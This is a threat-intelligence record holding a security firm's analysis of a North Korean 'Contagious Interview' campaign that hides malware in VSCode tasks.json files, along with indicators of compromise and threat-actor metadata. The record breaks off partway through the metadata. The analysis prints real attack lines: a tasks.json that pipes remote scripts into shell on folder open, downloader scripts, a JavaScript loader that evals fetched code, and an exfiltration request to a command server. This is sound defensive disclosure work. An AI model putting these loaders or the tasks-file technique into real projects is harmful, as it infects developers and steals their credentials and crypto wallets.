{
	"id": "e733e351-2507-4dbe-8e69-498f0b5c54e5",
	"created_at": "2026-04-06T00:15:01.916371Z",
	"updated_at": "2026-04-10T03:38:19.908753Z",
	"deleted_at": null,
	"sha1_hash": "f5d2a4fefd726cf1f371446b00cc2bad32e15737",
	"title": "Latest Contagious Interview malware campaign abuses Microsoft VSCode Tasks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1281539,
	"plain_text": "Latest Contagious Interview malware campaign abuses Microsoft\r\nVSCode Tasks\r\nBy OpenSourceMalware.com\r\nPublished: 2025-11-29 · Archived: 2026-04-05 22:04:59 UTC\r\nThe OSM team is very familiar with the North Korean DPRK “Contagious Interview” campaign and there are\r\nmany samples from this malware family in the OpenSourceMalware database.\r\nHowever, in this case, the initial infection vector was different from other Lazurus Group and Contagious\r\nInterview examples we've seen: This new version uses a novel infection technique. Instead of ClickFix, this\r\ncampaign uses Microsoft Visual Studio Code tasks files to infect the victim computer and create persistence. This\r\nwas new.\r\nAll of the attack chain components involved have been added to OpenSourceMalware's database and 100% of that\r\ndata is available to the public for free. We have also reached out to Vercel, GitHub and Atlassian and asked them\r\nto remove all these resources.\r\nAttack Chain Chronology\r\nThe contagious interview campaign targets software engineers, and there are two common targeting scenarios:\r\nA software engineer is targeted on LinkedIn by someone claiming to be a recruiter. They are typically\r\ntargeted because they work for a crypto company or have some connection to the crypto industry. A fake\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 1 of 20\n\nrecruiter reaches out with a high paying opportunity to entice the developer to take their lure.\r\nA software engineer is targeted because they work on many projects at the same time and for many clients.\r\nIn this version, the victim is approached on Upwork, Fiverr or other freelancing websites by someone\r\npretending to want to hire them for a new project.\r\nIn either scenario above, the threat actor will ask the victim to git clone a repository from Bitbucket, GitLab or\r\nGitHub. 
With this latest version of the “contagious interview” campaign, the threat actor will then ask the victim\r\nto “take a look at the code” so the victim can identify issues in the application and suggest fixes.\r\nMalware is leveraging VSCode Tasks\r\nWhen the victim clones the repo, two files are included in the .vscode directory: settings.json and tasks.json. The\r\nsecond file, tasks.json, is a Microsoft VSCode tasks file:\r\n./petshop/.vscode\r\n├── settings.json\r\n└── tasks.json\r\nVisual Studio Code tasks let users integrate external tools and automate workflows directly in the editor. These\r\ntasks enable running scripts, starting processes, and executing commands—all without leaving VS Code or\r\nopening a separate command line. This tasks file delivers the first stage of the malware, and also creates\r\npersistence. This is enabled by the runOptions property in the tasks file. Persistence is achieved as that property\r\nis set to runOn: folderOpen in the tasks file so each time the user opens that file, or any other file in that\r\ndirectory, the tasks will run as you can see here:\r\n{\r\n \"version\": \"1.0.0\",\r\n \"tasks\": [\r\n {\r\n \"label\": \"env\",\r\n \"type\": \"shell\",\r\n \"osx\": {\r\n \"command\": \"curl 'https://vscode-setup[.]vercel[.]app/settings/mac?flag=1 | sh\"\r\n },\r\n \"linux\": {\r\n \"command\": \"wget -qO- 'https://vscode-setup[.]vercel[.]app/settings/linux?flag=1' | sh\"\r\n },\r\n \"windows\": {\r\n \"command\": \"curl https://vscode-setup[.]vercel[.]app/settings/windows?flag=1 | cmd\"\r\n },\r\n \"problemMatcher\": [],\r\n \"presentation\": {\r\n \"reveal\": \"never\",\r\n \"echo\": false,\r\n \"focus\": false,\r\n\"close\": true,\r\n \"panel\": \"dedicated\",\r\n \"showReuseMessage\": false\r\n },\r\n \"runOptions\": {\r\n \"runOn\": \"folderOpen\"\r\n }\r\n }\r\n ],\r\n}\r\nA novel infection technique\r\nIf the victim opens the source code 
in Microsoft Visual Studio Code they will get prompted once to trust the\r\nauthors of the files in the repo:\r\nThis is the initial infection vector. Once the victim trusts the authors, they won't be prompted again. This is critical\r\nbecause the task file executes every time the user opens VSCode or any file in the repository—this is how the\r\nthreat actor maintains persistence. This is a pretty ingenious way to install the malware loader, and create\r\npersistence. We didn't realize that VSCode had this ability to automate functions in the IDE, and while we\r\nunderstand how that could be attractive to developers, we wonder if Microsoft really thought it through. We\r\nsuspect that this vector will quickly supplant ClickFix as the initial infection vector of choice for Lazarus Group.\r\nIt turns out that other researchers had theorized that VSCode Tasks could be weaponized. In September\r\noasis.security wrote a blog post about this in relation to teams using Cursor and other AI agents. And back in June\r\na researcher named SaadAhla created a PoC taking advantage of VSCode task files. Thanks to Rami McCarthy\r\nand Ax Sharma for their help here.\r\nBack to the payload: The commands in the tasks.json file will download a loader script specific to the operating\r\nsystem of the compromised victim. The malware has payloads for MacOS, Linux or Microsoft Windows. 
Here’s\r\nthe Linux version of that secondary loader:\r\n#!/bin/bash\r\nset -e\r\necho \"Authenticated\"\r\nTARGET_DIR=\"$HOME/.vscode\"\r\nclear\r\nwget -q -O \"$TARGET_DIR/vscode-bootstrap.sh\" \"http://vscode-setup.vercel.app/settings/bootstraplinux?flag=1\"\r\nclear\r\nchmod +x \"$TARGET_DIR/vscode-bootstrap.sh\"\r\nclear\r\nnohup bash \"$TARGET_DIR/vscode-bootstrap.sh\" \u003e /dev/null 2\u003e\u00261 \u0026\r\nclear\r\nexit 0\r\nWhen the bootstrap file is downloaded and run, it immediately downloads two more files, package.json and env-setup.js, and saves them in the user's home directory. The env-setup.js file is the third loader; this is the part of the bootstrap script that fetches it:\r\nUSER_HOME=\"$HOME/.vscode\"\r\nmkdir -p \"${USER_HOME}\"\r\nBASE_URL=\"http://vscode-setup.vercel.app\"\r\necho \"[INFO] Downloading env-setup.js and package.json...\"\r\nif ! command -v curl \u003e/dev/null 2\u003e\u00261; then\r\n wget -q -O \"${USER_HOME}/env-setup.js\" \"${BASE_URL}/settings/env?flag=1\"\r\n wget -q -O \"${USER_HOME}/package.json\" \"${BASE_URL}/settings/package\"\r\nelse\r\n curl -s -L -o \"${USER_HOME}/env-setup.js\" \"${BASE_URL}/settings/env?flag=1\"\r\n curl -s -L -o \"${USER_HOME}/package.json\" \"${BASE_URL}/settings/package\"\r\nfi\r\nThe env-setup.js file downloads a fourth loader script:\r\nconst axios = require('axios');\r\nconst host = \"ip-api-check-nine.vercel.app\";\r\nconst apikey = \"3aeb34a31\";\r\naxios\r\n .get(\r\n `https://ip-api-check-nine.vercel.app/icons/701`,\r\n { headers: { \"bearrtoken\": \"logo\" } },\r\n )\r\n .then((response) =\u003e {\r\n eval(response.data);\r\n return response.data;\r\n })\r\n .catch((err) =\u003e {\r\n return false;\r\n });\r\nWhen that env-setup script is executed it downloads a fifth file, which is a large obfuscated JavaScript file. 
This\r\nfile is the BeaverTail Type 701 variant malware.\r\nCryptostealer component\r\nThis version of BeaverTail targets at least 43 different crypto-related browser extensions for exfiltration including:\r\nMetaMask (Ethereum) - nkbihfbeogaeaoehlefnkodbefgpgknn\r\nPhantom (Solana) - bfnaelmomeimhlpmgjnjophhpkoljnlb\r\nCoinbase Wallet - hnfanknocfeofbddgcijnmhnfnkdnaad\r\nBinance Chain - fhbohimaelbohpjbbldcngcnapndodjp\r\nTronLink (Tron) - ibnejdfjmmkpcnlpebklmnkoeoihofec\r\nRonin Wallet (Axie Infinity) - fnjhmkhhmkbjkkabndcnnogagogbneec\r\nTrust Wallet - egjidjbpglichdcondbcbdnbeeppgdph\r\nExodus Web3 - aholpfdialjgjfhomihkjbmgjidlcdno\r\nOKX Wallet - mcohilncbfahbmgdjkbpemcciiolgcge\r\nMath Wallet - afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nAnd 33+ additional wallets\r\nThe crypto stealer also targets several crypto wallet providers:\r\nExodus - Full wallet directory (all currencies)\r\nSolana CLI - ~/.config/solana/id.json keypair file\r\nThe BeaverTail malware also steals login credentials, session cookies (for account takeover), LocalStorage data,\r\nLevelDB databases (.ldb files), and MacOS keychain databases.\r\nThe malware specifically targets several browsers including Google Chrome, Brave, Opera and Firefox. This\r\nBeaverTail variant compresses exfiltrated data using zip -r and then exfiltrates it all to an IP address:\r\nPOST \u003chttp://146.70[.]41[.]188:1224/uploads\u003e\r\nContent-Type: multipart/form-data\r\n{\n type: \"7\",\n htype: \"\",\n identifier: \"\",\n gtype: \"701\",\n files: [/* stolen file streams */]\n}\nThere also appears to be a second C2 mentioned in some of the Beavertail samples that will use\napi[.]npoint[.]io/96979650 as a backup. 
This is not surprising as we have seen Lazarus Group use npoint.io\nfor months now.\n“Invisible Ferret” Python malware\nThe malware then downloads the python based Invisible Ferret from\nhttp://146.70[.]41[.]188:1224/client/7/701\nThis Python file operates as a highly sophisticated multi-stage malware dropper that leverages extreme\nobfuscation to evade detection and analysis. At its core, the malware employs 64 nested layers of obfuscation,\nwhere each layer combines reverse base64 encoding with zlib compression. This creates an onion-like structure\nthat must be peeled back one layer at a time, with each layer using a lambda function to reverse the payload string,\ndecode it from base64, decompress it with zlib, and execute the result. This technique forces analysts to manually\ndecode each layer in sequence, as automated tools struggle with the computational complexity and memory\nrequirements of processing so many nested transformations. The obfuscation serves dual purposes: it defeats\nsignature-based detection systems that rely on static pattern matching, and it significantly increases the time and\nresources required for manual analysis.\nWe got five layers deep manually before we decided to stuff it and asked Claude to write a function to decode the\nPython payload.\nOnce the obfuscation layers are decoded in memory, the core payload performs sophisticated environmental\ndetection and multi-stage payload delivery. The malware first identifies the victim's operating system (Windows,\nMacOS, or Linux) and creates a hidden directory at ~/.n2/ in the user's home folder. 
It then contacts a\ncommand-and-control (C2) server at 146.70[.]41[.]188:1224 using unencrypted HTTP to download two\nseparate payloads: a primary backdoor component ( /payload/ ) and a browser credential stealer ( /brow/ ).\nThese files are saved as way and pow respectively within the hidden directory.\nThe malware is sneaky, and employs platform-specific stealth techniques, such as creating hidden windows on\nWindows systems using subprocess flags and using abnormal exit codes on macOS to evade detection heuristics.\nCommand and Control (C2)\nThe Python malware communicates with an IP address 146.70[.]41[.]188 that according to Shodan is a\nWindows server hosted by M247 in New York. That IP address is a known DPRK C2 server and is listed on\nMaltrail's known Lazarus Group IP list.\r\nMultiple versions of this campaign\r\nWe have identified 13 different versions of this campaign spread across 27 different GitHub users, and 11 different\r\npayloads. This campaign uses some fairly convincing \"code puppet\" accounts, but if you look closer you can\r\nidentify they're synthetic.\r\nEach of the 13 different variants is served from a GitHub or Bitbucket repository. All versions of this new variant\r\nuse a Microsoft Visual Studio Code tasks file. These files are stored in the repository at .vscode/tasks.json and are\r\nexecuted any time a file in that directory is opened by VSCode. Each tasks.json file calls a Vercel URL that's\r\ncustom for each variant. The threat actors have designed a system that can deliver different payloads based on a\r\nparameter passed in the URL.\r\nSo, for example, variant one uses vscode-setup[.]vercel[.]app/settings/linux?flag=6 for its stage one loader.\r\nVariant three uses vscode-config[.]vercel[.]app/task/linux?token=812. 
Variant five uses isvalid-region[.]vercel[.]app/settings/linux?flag=8.\r\nAdditionally, each of the 11 different payloads downloads a different version of the BeaverTail JavaScript\r\nmalware. We have deobfuscated multiple versions of the BeaverTail payload, and so far they seem to use the same\r\nInvisible Ferret Python payload. We continue to work on collecting and cataloging all the malware samples.\r\nOur analysis confirms that while the threat actors used the VSCode tasks technique as far back as April 2025, it\r\nwasn't until two weeks ago that they started using this technique in earnest. This is underscored by the fact that the\r\nthreat actors modified existing older GitHub repositories to use this new infection vector.\r\nIt's possible that the earlier ClickFix version of the initial infection vector was becoming less effective, or perhaps\r\nthis new evolution of \"contagious interview\" is just criminals forking and evolving their techniques. Regardless,\r\nwe suspect that the VSCode tasks file technique will become more popular.\r\nSome of the variants below use a different C2 to pull the Python files. This URL pulls the complete Python source\r\ncode in one zip file: wget -O p.zip http://45.140.167[.]218:1224/pdown\r\nVariant zero - April 22, 2025 - Unique Identifier: token=99\r\ngithub.com/MentarisHub121/TokenPresaleApp\r\nNotes:\r\nThis repository predates variant one by one day, however, it has no git commit history.\r\nGitHub Users:\r\nyosket\r\nEmail Addresses:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant one - April 23, 2025 - Unique Identifier: token=99\r\ngithub.com/ChainspaceHub/TokenPresaleApp\r\nNotes:\r\nThis is the second oldest repository in the group and the .vscode/tasks.json file existed in the repo going all the\r\nway back to April 2025. 
This repository was under active development between April and July 2025 with 411\r\ncommits. As far as we can tell, this is the first time that Lazarus Group used VSCode task files.\r\nGitHub Users:\r\nChainspaceHub\r\nnikkhielseath\r\nyosket\r\nameeetgaikwad\r\nEmail Addresses:\r\nameeetgaikwad \u003camitmanojgaikwad@gmail[.]com\u003e\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant two - June 5, 2025 - Unique Identifier: flag=6\r\ngithub.com/CapsuleLabs-lgtml/Coin-ICO\r\nNotes:\r\nThis is the third oldest variant by repo age, but it appears as though this was an older contagious interview variant,\r\nand the tasks.json file was added two weeks ago.\r\nGitHub Users:\r\nCapsuleLabs-lgtml\r\nCapsuleLabs-lgtm\r\nEmail Associated:\r\nCapsuleLabs-lgtml \u003cjohnbiril510@gmail[.]com\u003e\r\nCapsuleLabs-lgtm \u003ccapcapsule3@gmail[.]com\u003e\r\nDomains:\r\nvscode-setup[.]vercel[.]app\r\nFile Hashes:\r\n869bce2efa60b60dab1e0fe8c9d94cfbd6476f4393f79564c4de26ec689dc64d ./beavertail\r\nVariant three - August 6, 2025 - Unique Identifier: token=812\r\ngithub.com/Gerome125/TokenPresale-dApp\r\nNotes:\r\nThis repository is different from the others as it has active development going on by at least 3 of the code puppets\r\ninvolved in this campaign. There are 411 commits so far in this repo which leads us to believe this is the root\r\nrepository that the threat actors are using. 
Most of the other repos in this campaign have less than ten commits.\r\nGitHub Users:\r\nGerome125\r\nnikkhielseath\r\nyosket\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 9 of 20\n\ndannythedawger\r\nBogdanHabic\r\nEmails Associated:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\ndannythedawger \u003cdaniel.c.daniil@gmail[.]com\u003e\r\nBogdanHabic bogdan@tenderly.co\r\nDomains:\r\nvscode-config[.]vercel[.]app\r\nVariant four - August 24, 2025 - Unique Identifier: flag=2\r\ngithub.com/softwareRoom1/skill-test\r\nNotes:\r\nThis is a child repo and has one commit from August 24.\r\nGitHub Users:\r\nbalocones\r\nsoftwareRoom1\r\nEmail Addresses:\r\nbalocones \u003ciandavies2313@gmail[.]com\u003e\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nVariant five - September 8, 2025 - Unique Identifier: flag=307\r\ngithub.com/markomilivojevic/ethvault_staking\r\nNotes:\r\nThis is a child repo and has two commits from September 8 and November 10, 2025.\r\nGitHub Users:\r\nm/markomilivojevic\r\nJames Smith\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 10 of 20\n\nEmail Addresses:\r\nJames Smith \u003cellisfleming574@gmail[.]com\u003e\r\nMarko Milivojevic \u003cmilivojemarko@gmail[.]com\u003e\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant six - September 8, 2025 - Unique Identifier: flag=6\r\ngithub.com/DAP2506/thirdweb-skill-test\r\nNotes:\r\nThis is a secondary repository and has 4 commits between October 21 and November 10, 2025.\r\nGitHub Users:\r\nDAP2506\r\nyenthanh\r\nEmail Addresses:\r\nDAP2506 \u003cdapanchal2506@gmail[.]com\u003e\r\nyenthanh \u003cphamminh1309@gmail[.]com\u003e\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nFile Hashes:\r\nebfaff5c2e9b709c1337e06a756f7ee69fc29d319a27adaafe73eb84d8a43b61 ./beavertail\r\nVariant seven - September 9, 2025 - Unique Identifier: flag=1\r\ngithub.com/megaorg42/CoinLocatorDemo\r\nNotes:\r\nThis repo 
appears to be the parent repository for several of the variants as it currently has 211 commits, although it\r\nhasn't been active in three weeks.\r\nGitHub Users:\r\nmegaorg42\r\nnikkhielseath\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 11 of 20\n\nyosket\r\nEmails Associated:\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant eight - September 9, 2025 - Unique Identifier: flag=8\r\ngithub.com/Ambition-lead/linkfi\r\nNotes:\r\nThis repo appears to be the parent for several of the variants as it has 356 commits but has been inactive for a\r\nmonth.\r\nGitHub Users:\r\nAmbition-lead\r\nnikkhielseath\r\nyosket\r\ndannythedawger\r\nameeetgaikwad\r\nEmail Addresses:\r\nyosket \u003cyosket87@gmail[.]com\u003e\r\nameeetgaikwad \u003camitmanojgaikwad@gmail[.]com\u003e\r\nnikkhielseath \u003csethnikhil74@gmail[.]com\u003e\r\ndannythedawger \u003cdaniel.c.daniil@gmail[.]com\u003e\r\nDomains:\r\nisvalid-region[.]vercel[.]app\r\nVariant nine - September 30, 2025 - Unique Identifier: flag=5\r\ngithub.com/SmartPay24/Demo\r\nNotes:\r\nThis repo was only recently added on September 30, and has two commits: On Sept 30 and November 10, 2025.\r\nGitHub Users:\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 12 of 20\n\nsmartpayauthor\r\nSmartPay24\r\nEmail Addresses:\r\nsmartpayauthor smartpay@smart.com\r\nsmartpayauthor \u003csmartpayauthor@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant ten - November 11, 2025 - Unique Identifier: flag=1\r\np_e_t-admin@bitbucket[.]org/p_e_t\r\nNotes:\r\nThis is the only repository we've identified that uses Bitbucket, however we've seen an overall increase in the use\r\nof Bitbucket by Lazarus Group.\r\nEmail Associated:\r\nstrong \u003cstrong.business.info@gmail[.]com\u003e\r\nDomains:\r\nvscode-setup[.]vercel[.]app\r\nFile 
Hashes:\r\n54a5c5cb16bdd482bd4147200557d3a94e413f9e9aebbf4818e76f16331bc6dc ./beavertail\r\nVariant eleven - November 13, 2025 - Unique Identifier: token=104\r\ngithub.com/winterteam03311/apom\r\ngithub.com/tinitachodos/apom22\r\ngithub.com/tinitachodos/apom\r\nNotes:\r\nThese repos are all child repos and have 1 commit each from November 13, 2025. Unlike most of the other\r\nrepositories in this campaign, these repos don't include the contracts folder and the GitHub accounts look like\r\nthrowaway accounts.\r\nGitHub Users:\r\nLuckystar483\r\nwinterteam03311\r\ntinitachodos\r\nEmail Addresses:\r\nlucafan8973 \u003cferexmoto6@gmail[.]com\u003e\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant twelve - November 13, 2025 - Unique Identifier: flag=301\r\ngithub.com/AbdullahSalihOner/golden-task\r\nNotes:\r\nThis GitHub user almost appears real at first glance, but then upon closer inspection it feels fake. 
The user owns\r\n83 repos, but many of them appear to be quickly generated with very few files and only one commit.\r\nGitHub Users:\r\nAbdullahSalihOner\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant thirteen - November 21, 2025 - Unique Identifier: flag=4\r\ngithub.com/MahnoorKhushbakht/test-assesment\r\nNotes:\r\nThis is one of the child repos and has 11 commits all from November 21, 2025.\r\nGitHub Users:\r\nMahnoorKhushbakht\r\nEmmanuel-bot-rgb\r\nmahnoor\r\nEmail Addresses:\r\nEmmanuel-bot-rgb \u003cpe699674@gmail[.]com\u003e\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 14 of 20\n\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\ntest-assesment-self[.]vercel[.]app\r\nFile hash:\r\n87e7f4ac95f090f9965175935955fdc02bee4b1bf417855bc65ff4bde9f271e5 ./beavertail\r\nVariant fourteen - September 18, 2025 (suspicious) - Unique Identifier: flag=1\r\ngithub.com/prahaladbelavadi/CoinLocatorDemo\r\nNotes:\r\nThis repo looks like it was published September 18, 2025, but here's the thing: This repo hasn't come up in any of\r\nour searches before, but today, suddenly we can find it with GitHub search. This leads us to believe that the git\r\ncommit dates were faked. 
This means we can't trust the GitHub timeline for this GitHub repo.\r\nGitHub Users:\r\nprahaladbelavadi\r\nnikkhielseath\r\nyosket\r\nDomains:\r\nvscode-load-config[.]vercel[.]app\r\nVariant fifteen - December 1, 2025 - Unique Identifier: flag=302\r\ngithub.com/eferos93/test4\r\nNotes:\r\nThis repo was published today December 1, 2025\r\nGitHub Users:\r\neferos93\r\nandrew_watson\r\nkoinos-finance\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 15 of 20\n\nVariant sixteen - November 17, 2025 - Unique Identifier: flag=6\r\ngithub.com/shangesh-tech/thirdweb_testing\r\nNotes:\r\nThis repo was published November 17, 2025.\r\nGitHub Users:\r\nshangesh-tech\r\nEmail Addresses:\r\nDomains:\r\nvscode-helper171[.]vercel[.]app\r\nVariant seventeen - November 26, 2025 - Unique Identifier: flag=307\r\ngithub.com/jpoullet2000/ethvault_staking_project\r\nNotes:\r\nThis repo was published November 26, 2025\r\nGitHub Users:\r\njpoullet2000\r\nJames Smith\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nVariant eighteen - November 26, 2025 - Unique Identifier: flag=307\r\ngithub.com/ihzhatamamy/-MagicDoor_Property_Rental\r\nNotes:\r\nThis repo was published November 23, 2025\r\nGitHub Users:\r\nihzhatamamy\r\nhttps://opensourcemalware.com/blog/contagious-interview-vscode\r\nPage 16 of 20\n\nJames Smith\r\nEmail Addresses:\r\nDomains:\r\nvscode-bootstrapper[.]vercel[.]app\r\nLazarus Group loves hosting payloads on Vercel\r\nDPRK threat actors have flocked to Vercel, and are now using it almost exclusively. We don't know why, but\r\nContagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.\r\nWe have reached out to Vercel and asked them to take down these endpoints. 
We will report back here on their\r\nresponse.\r\nIndicators of compromise\r\nIP addresses:\r\n146.70[.]41[.]188\r\nGit repositories\r\nWe found these with this search on GitHub: path:.vscode/tasks.json 
vercel.app\r\nNPM packages\r\nreact-svg-plugin\r\nreact-svg-config\r\nFile hashes\r\n87e7f4ac95f090f9965175935955fdc02bee4b1bf417855bc65ff4bde9f271e5 ./beavertail # sample test-assessment\r\n54a5c5cb16bdd482bd4147200557d3a94e413f9e9aebbf4818e76f16331bc6dc ./beavertail # sample petshop\r\n869bce2efa60b60dab1e0fe8c9d94cfbd6476f4393f79564c4de26ec689dc64d ./beavertail # sample Coin-ICO\r\nebfaff5c2e9b709c1337e06a756f7ee69fc29d319a27adaafe73eb84d8a43b61 ./beavertail # sample thirdweb-skill-test\r\nef12b15466255fafda6225a557cce780baa6b1c98adcf111f5564e7b3ecc0e14 ./invisible-ferret.py\r\nAdditional “contagious interview” resources\r\nGitLab article: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nhttps://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2\r\nAdditional technical details\r\nOpenSourceMalware has compiled detailed technical analysis on both BeaverTail and Invisible Ferret files and\r\ntheir associated collateral. 
If you would like access to this data please contact us HERE\r\nSource: https://opensourcemalware.com/blog/contagious-interview-vscode",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://opensourcemalware.com/blog/contagious-interview-vscode"
	],
	"report_names": [
		"contagious-interview-vscode"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
